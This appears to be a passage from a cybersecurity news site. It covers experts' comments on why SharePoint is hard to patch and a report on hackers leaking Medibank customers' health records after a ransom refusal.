Beaumont told Rest of World that the problem is that organizations that use SharePoint have not patched it yet, in part because the patching process is not straightforward. “SharePoint patching is also notoriously complicated — it would be quicker to watch the extended versions of The Hobbit trilogy and The Lord of the Rings trilogy back to back than try to update the average large SharePoint farm,” Beaumont said in a chat.

That’s what makes SharePoint such an appealing target — and so difficult to patch: with so many companies and governments relying on the software as an internal network, it is often configured to run alongside other essential systems, making it complex and time-consuming to update. Nobody wants their laptop to stay in blue screen while waiting for an update — let alone the server network for an entire municipality or billion-dollar corporation.

Another complication, said Beaumont, is that Microsoft has since launched a cloud version of SharePoint, called SharePoint Online, which makes patching much easier — but not all users have migrated to the cloud. “If SharePoint Online didn’t exist, all customers would be screaming about patching by now, in my opinion. Instead, that research and development has gone to cloud,” Beaumont said.

Companies that rely on sales tend to focus on developing new products rather than fixes for systems they’ve already sold, according to Childs at Zero Day Initiative, which means developing patches is rarely at the top of the list. “The state of patching really has not progressed much in the last 15 years,” said Childs, adding that as many as 20% of vulnerabilities his organization pays researchers for are from failed patches. “It’s kind of astonishing.”

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Please login to bookmark

Hackers leak Australian health records on dark web

By

RiSec.Mitch

-

9 November 2022

Hackers have followed through on a threat to leak sensitive medical records stolen from a major Australian health company that counts the country’s prime minister among nearly 10 million customers.

Medibank told investors that a “sample” selection of customer data was posted on a “dark web forum” on Wednesday after it refused to pay a ransom demand.

The data included names, birth dates, passport numbers and information on medical claims for hundreds of customers who were separated into “naughty” and “nice” lists.

Some on the “naughty” list had numeric codes that appeared to link them to drug addiction, alcohol abuse and HIV infection.

For example, one record carried an entry that read: “p_diag: F122”.

F122 corresponds with “cannabis dependence” under the International Classification of Diseases, published by the World Health Organization.

Medibank is Australia’s largest private health insurer and the hack is likely to include some of the country’s most influential and wealthy individuals.

Prime Minister Anthony Albanese said he himself was a Medibank customer and that the attack was a “wake-up call” for corporate Australia.

Potential Russian link

The perpetrator of the hack has not yet been publicly identified.

But the Australian Federal Police’s Justine Gough said it was the work of a “criminal or criminal groups” that could be operating outside the country.

Sanjay Jha, chief scientist at the University of New South Wales’s Institute for Cyber Security, said it was difficult to attribute any attack to a single group.

However, he told AFP it carried some of the hallmarks associated with a Russian hacker group called REvil—which has previously targeted everything from Brazilian meat company JBS to Lady Gaga.

“The pattern matches the behaviour in parts. So that is why there is a serious indication it could be them selling the data,” Jha said.

A defunct REvil website has been redirecting traffic to the dark web forum where the Medibank data was leaked.

REvil—an amalgam of ransomware and evil—was the subject of a US$10 million reward from US authorities before being reportedly dismantled by Russia this year.

JBS Foods, one of the largest beef producers in the world, paid REvil a ransom of US$11 million in 2021.

Jha said the hackers could now look to sell the sensitive data to blackmailers and other scammers.

‘Scumbags’ and ‘crooks’

The hackers also uploaded what they said were a series of messages sent to Medibank in the days before the leak.

“We will do everything in our power to inflict as much damage as possible for you, both financial and reputational,” one message from the hackers read.

Hundreds of millions of US dollars have been wiped off Medibank’s market value, with the company’s share price down more than 20 percent since October, when news of the leak first emerged.

Troy Hunt, a cyber security expert working for Microsoft, wrote on Twitter that the breach was “about as bad as we feared it would get”.

The Medibank hack followed an attack on telecom company Optus in September that exposed the personal information of some nine million Australians.

Jha said the enormous Medibank and Optus data breaches could make it easier to carry out cyber attacks on different systems in the future.

“A lot of credentials have been stolen in recent months,” he said. “That makes the job of attackers easier—they can go and try other systems with millions of credentials.”

Australia’s assistant treasurer Stephen Jones said the perpetrators were “scumbags” and “crooks”.

“We shouldn’t be giving in to these fraudsters,” he told local media.

As Medibank tried to contain the leak, it was also staring down the barrel of a potentially costly class action lawsuit.

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.